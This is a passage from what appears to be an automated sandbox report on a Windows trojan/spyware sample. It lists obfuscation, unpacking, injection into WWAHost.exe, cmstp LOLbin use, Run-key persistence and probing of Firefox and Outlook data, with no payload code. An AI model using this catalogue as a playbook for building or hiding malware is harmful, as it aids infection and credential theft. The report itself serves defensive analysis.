3_2_0341547E 3_2_0341547E Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_03401410 3_2_03401410 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_0349F42B 3_2_0349F42B Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034ADCC5 3_2_034ADCC5 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034A44EF 3_2_034A44EF Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034B2C9A 3_2_034B2C9A Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034B1C9F 3_2_034B1C9F Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_034A3490 3_2_034A3490 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_003C78F0 3_2_003C78F0 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_003DB1CB 3_2_003DB1CB Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_003DAB60 3_2_003DAB60 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_003D9D48 3_2_003D9D48 Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 3_2_003D9F03 3_2_003D9F03 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EC26F8 15_2_06EC26F8 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EB3E96 15_2_06EB3E96 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E24E61 15_2_06E24E61 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EBCE66 15_2_06EBCE66 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E25E70 15_2_06E25E70 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E17640 15_2_06E17640 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E26611 15_2_06E26611 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EC1FCE 15_2_06EC1FCE Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EB2782 15_2_06EB2782 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E15790 15_2_06E15790 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EC1746 15_2_06EC1746 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EB44EF 15_2_06EB44EF Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EBDCC5 15_2_06EBDCC5 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EC1C9F 15_2_06EC1C9F Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EC2C9A 15_2_06EC2C9A Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EB3490 15_2_06EB3490 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E2547E 15_2_06E2547E Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EAF42B 15_2_06EAF42B Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E0740C 15_2_06E0740C Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E11410 15_2_06E11410 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EA1DE3 15_2_06EA1DE3 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EAFDDB 15_2_06EAFDDB Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EBD5D2 15_2_06EBD5D2 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E9E58A 15_2_06E9E58A Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EBE581 15_2_06EBE581 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06DF0D40 15_2_06DF0D40 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E11530 15_2_06E11530 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E9C53F 15_2_06E9C53F Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EB1D1B 15_2_06EB1D1B Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EC2519 15_2_06EC2519 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06DD9528 15_2_06DD9528 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EC22DD 15_2_06EC22DD Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E142B0 15_2_06E142B0 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EC1A99 15_2_06EC1A99 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E24A5B 15_2_06E24A5B Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E2523D 15_2_06E2523D Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EB0A02 15_2_06EB0A02 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06ECE214 15_2_06ECE214 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E263C2 15_2_06E263C2 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06DFEBE0 15_2_06DFEBE0 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E24B96 15_2_06E24B96 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E1FB40 15_2_06E1FB40 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06DD3314 15_2_06DD3314 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E4531D 15_2_06E4531D Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EC28E8 15_2_06EC28E8 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E248CB 15_2_06E248CB Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EA18B6 15_2_06EA18B6 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E0A080 15_2_06E0A080 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E21070 15_2_06E21070 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E2E020 15_2_06E2E020 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E20021 15_2_06E20021 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E29810 15_2_06E29810 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EBD016 15_2_06EBD016 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EC19E2 15_2_06EC19E2 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06EB61DF 15_2_06EB61DF Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06ECD9BE 15_2_06ECD9BE Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E26180 15_2_06E26180 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E2594B 15_2_06E2594B Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E49906 15_2_06E49906 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: 15_2_06E27110 15_2_06E27110
 Found potential string decryption / allocating functions Show sources
 Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: String function: 06DFB0E0 appears 176 times Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: String function: 06E4DDE8 appears 44 times Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Code function: String function: 06E85110 appears 38 times Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 0343DDE8 appears 48 times Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 033EB0E0 appears 176 times Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 03475110 appears 38 times Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: String function: 06E45110 appears 38 times Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: String function: 06DBB0E0 appears 176 times Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: String function: 06E0DDE8 appears 48 times
 PE file contains strange resources Show sources
 Source: ACre0O2rKa.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST Source: ACre0O2rKa.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST Source: 5jd0x8e0uzsd8l.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST Source: 5jd0x8e0uzsd8l.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
 Sample file is different than original file name gathered from version info Show sources
 Source: ACre0O2rKa.exe, 00000000.00000002.579024409.0000000000492000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUsedly.exe vs ACre0O2rKa.exe Source: ACre0O2rKa.exe, 00000000.00000002.579614105.00000000020D0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs ACre0O2rKa.exe Source: ACre0O2rKa.exe, 00000000.00000002.579705323.0000000002220000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUsedly.exeFE2XFortogden7 vs ACre0O2rKa.exe Source: ACre0O2rKa.exe, 00000001.00000002.646807472.0000000006CA3000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameWWAHost.exej% vs ACre0O2rKa.exe Source: ACre0O2rKa.exe, 00000001.00000002.647439064.0000000006EAF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs ACre0O2rKa.exe Source: ACre0O2rKa.exe, 00000001.00000000.577859120.0000000000492000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUsedly.exe vs ACre0O2rKa.exe Source: ACre0O2rKa.exe Binary or memory string: OriginalFilenameUsedly.exe vs ACre0O2rKa.exe
 Searches the installation path of Mozilla Firefox Show sources
 Source: C:\Windows\SysWOW64\WWAHost.exe Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory Jump to behavior
 Uses a Windows Living Off The Land Binaries (LOL bins) Show sources
 Source: unknown Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
 Yara signature match Show sources
 Classification label Show sources
 Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@22/6@8/3
 Creates files inside the user directory Show sources
 Source: C:\Windows\SysWOW64\WWAHost.exe File created: C:\Users\user\AppData\Roaming\8KA1218A Jump to behavior
 Creates mutexes Show sources
 Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3740:120:WilError_01
 Creates temporary files Show sources
 Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Uolmxh0 Jump to behavior
 PE file has an executable .text section and no other executable section Show sources
 Source: ACre0O2rKa.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
 Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic) Show sources
 Reads ini files Show sources
 Reads software policies Show sources
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
 Reads the hosts file Show sources
 Sample is known by Antivirus Show sources
 Source: ACre0O2rKa.exe Virustotal: Detection: 74% Source: ACre0O2rKa.exe ReversingLabs: Detection: 82%
 Spawns processes Show sources
 Uses an in-process (OLE) Automation server Show sources
 Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32 Jump to behavior
 Writes ini files Show sources
 Source: C:\Windows\SysWOW64\WWAHost.exe File written: C:\Users\user\AppData\Roaming\8KA1218A\8KAlogri.ini Jump to behavior
 Found graphical window changes (likely an installer) Show sources
 Source: Window Recorder Window detected: More than 3 window changes detected
 Checks if Microsoft Office is installed Show sources
 Source: C:\Windows\SysWOW64\WWAHost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
 Binary contains paths to debug symbols Show sources
 Source: Binary string: WWAHost.pdb source: ACre0O2rKa.exe, 00000001.00000002.646478162.0000000006BF0000.00000040.00000001.sdmp Source: Binary string: cmstp.pdbGCTL source: 5jd0x8e0uzsd8l.exe, 00000010.00000003.1106836628.0000000000673000.00000004.00000001.sdmp Source: Binary string: wscript.pdbGCTL source: 5jd0x8e0uzsd8l.exe, 0000000F.00000002.1103000514.0000000002190000.00000040.00000001.sdmp Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.626009404.000000000D160000.00000002.00000001.sdmp Source: Binary string: msdt.pdbGCTL source: 5jd0x8e0uzsd8l.exe, 00000014.00000002.1136585300.0000000006CB0000.00000040.00000001.sdmp Source: Binary string: WWAHost.pdbUGP source: ACre0O2rKa.exe, 00000001.00000002.646478162.0000000006BF0000.00000040.00000001.sdmp Source: Binary string: wntdll.pdbUGP source: ACre0O2rKa.exe, 00000001.00000002.647439064.0000000006EAF000.00000040.00000001.sdmp, WWAHost.exe, 00000003.00000002.1228048773.00000000033C0000.00000040.00000001.sdmp, 5jd0x8e0uzsd8l.exe, 0000000F.00000002.1109567888.0000000006EEF000.00000040.00000001.sdmp, 5jd0x8e0uzsd8l.exe, 00000010.00000002.1112600401.0000000006E10000.00000040.00000001.sdmp, wscript.exe, 00000012.00000002.1105602739.000000000498F000.00000040.00000001.sdmp, cmstp.exe, 00000013.00000002.1110322751.0000000004AA0000.00000040.00000001.sdmp, 5jd0x8e0uzsd8l.exe, 00000014.00000002.1137111824.0000000006E40000.00000040.00000001.sdmp, msdt.exe, 00000015.00000002.1136038933.000000000100F000.00000040.00000001.sdmp Source: Binary string: wntdll.pdb source: ACre0O2rKa.exe, WWAHost.exe, 5jd0x8e0uzsd8l.exe, 5jd0x8e0uzsd8l.exe, 00000010.00000002.1112600401.0000000006E10000.00000040.00000001.sdmp, wscript.exe, 00000012.00000002.1105602739.000000000498F000.00000040.00000001.sdmp, cmstp.exe, 00000013.00000002.1110322751.0000000004AA0000.00000040.00000001.sdmp, 5jd0x8e0uzsd8l.exe, 00000014.00000002.1137111824.0000000006E40000.00000040.00000001.sdmp, msdt.exe, 00000015.00000002.1136038933.000000000100F000.00000040.00000001.sdmp Source: Binary string: wscript.pdb source: 5jd0x8e0uzsd8l.exe, 0000000F.00000002.1103000514.0000000002190000.00000040.00000001.sdmp Source: Binary string: cmstp.pdb source: 5jd0x8e0uzsd8l.exe, 00000010.00000003.1106836628.0000000000673000.00000004.00000001.sdmp Source: Binary string: msdt.pdb source: 5jd0x8e0uzsd8l.exe, 00000014.00000002.1136585300.0000000006CB0000.00000040.00000001.sdmp Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.626009404.000000000D160000.00000002.00000001.sdmp

Data Obfuscation:

 Detected unpacking (changes PE section rights) Show sources
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Unpacked PE file: 1.2.ACre0O2rKa.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER; Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Unpacked PE file: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER; Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Unpacked PE file: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER; Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe Unpacked PE file: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;
 Uses code obfuscation techniques (call, push, ret) Show sources
 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402E40 push 004012B8h; ret 0_2_00402E53 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402A44 push 004012B8h; ret 0_2_00402A57 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403444 push 004012B8h; ret 0_2_00403457 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403048 push 004012B8h; ret 0_2_0040305B Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402C4C push 004012B8h; ret 0_2_00402C5F Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402850 push 004012B8h; ret 0_2_00402863 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403250 push 004012B8h; ret 0_2_00403263 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402E54 push 004012B8h; ret 0_2_00402E67 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402A58 push 004012B8h; ret 0_2_00402A6B Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403458 push 004012B8h; ret 0_2_0040346B Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_0040305C push 004012B8h; ret 0_2_0040306F Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402C60 push 004012B8h; ret 0_2_00402C73 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402864 push 004012B8h; ret 0_2_00402877 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403264 push 004012B8h; ret 0_2_00403277 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402E68 push 004012B8h; ret 0_2_00402E7B Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402A6C push 004012B8h; ret 0_2_00402A7F Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_0040346C push 004012B8h; ret 0_2_0040347F Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403070 push 004012B8h; ret 0_2_00403083 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402C74 push 004012B8h; ret 0_2_00402C87 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402878 push 004012B8h; ret 0_2_0040288B Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403278 push 004012B8h; ret 0_2_0040328B Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402E7C push 004012B8h; ret 0_2_00402E8F Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402800 push 004012B8h; ret 0_2_00402813 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403200 push 004012B8h; ret 0_2_00403213 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402E04 push 004012B8h; ret 0_2_00402E17 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402A08 push 004012B8h; ret 0_2_00402A1B Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403408 push 004012B8h; ret 0_2_0040341B Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_0040300C push 004012B8h; ret 0_2_0040301F Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402C10 push 004012B8h; ret 0_2_00402C23 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00402814 push 004012B8h; ret 0_2_00402827 Source: C:\Users\user\Desktop\ACre0O2rKa.exe Code function: 0_2_00403214 push 004012B8h; ret 0_2_00403227

Persistence and Installation Behavior:

 Drops PE files Show sources
 Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Uolmxh0\5jd0x8e0uzsd8l.exe Jump to dropped file

Boot Survival:

 Creates an autostart registry key Show sources
 Source: C:\Windows\SysWOW64\WWAHost.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run TV1TEJQ8W4 Jump to behavior Source: C:\Windows\SysWOW64\WWAHost.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run TV1TEJQ8W4 Jump to behavior

Hooking and other Techniques for Hiding and Protection:

 Disables application error messsages (SetErrorMode) Show sources